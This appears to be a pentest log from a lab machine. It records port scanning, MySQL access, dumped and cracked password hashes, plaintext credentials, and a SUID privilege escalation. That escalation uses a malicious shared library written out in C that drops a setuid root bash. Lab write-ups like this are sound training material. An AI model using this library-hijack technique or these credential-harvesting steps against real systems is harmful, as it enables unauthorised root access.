🧪 Pentest Log: {{date:2025-08-01}}

🔍 Target Information

• Machine Name: dev_working
• IP Address: 192.168.176.205
• Operating System: Linux

ip=192.168.176.205

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

ssh bob@$ip

Port 3306

mysql -u slv01 -p -h $ip --skip-ssl-verify-server-cert

found User table under dev01 database

root:B3B72B283F43DC8302F73E94245F4D4D
bob:22958710C569D1FA791F43ABA4D4E9EA (sunflower)

https://crackstation.net/

Port 8983

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

found http://192.168.176.205:8983/solr/#/dev01/files?file=db-data-config.xml

slv01:nBk3c4gj0J

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 22
• Vulnerability Type: N/A

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

N/A

🧬 Privilege Escalation

👤 Current Access

• User: bob
• Groups: bob
• Shell Type: ssh

🔍 Enumeration

SUID:

ls -al ./backup

found

-rwsr-xr-x 1 root root 14472 Feb 17 15:28 ./backup

strings ./backup

found password and a shared library

B4cup32M4n4age

./lib_backup.so

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: SUID
• Target Binary/Service: backup
• Reference / Source: N/A

🔧 Exploit Steps

• Setup

vim exploit.c

#include <stdlib.h>
#include <unistd.h>

void _init() {
    setuid(0);
    setgid(0);
    system("cp /bin/bash .");
    system("chmod +s ./bash");
}

gcc -shared -fPIC -nostartfiles -o lib_backup.so exploit.c

• Smash to root

./backup

B4cup32M4n4age

3

exit

./bash -p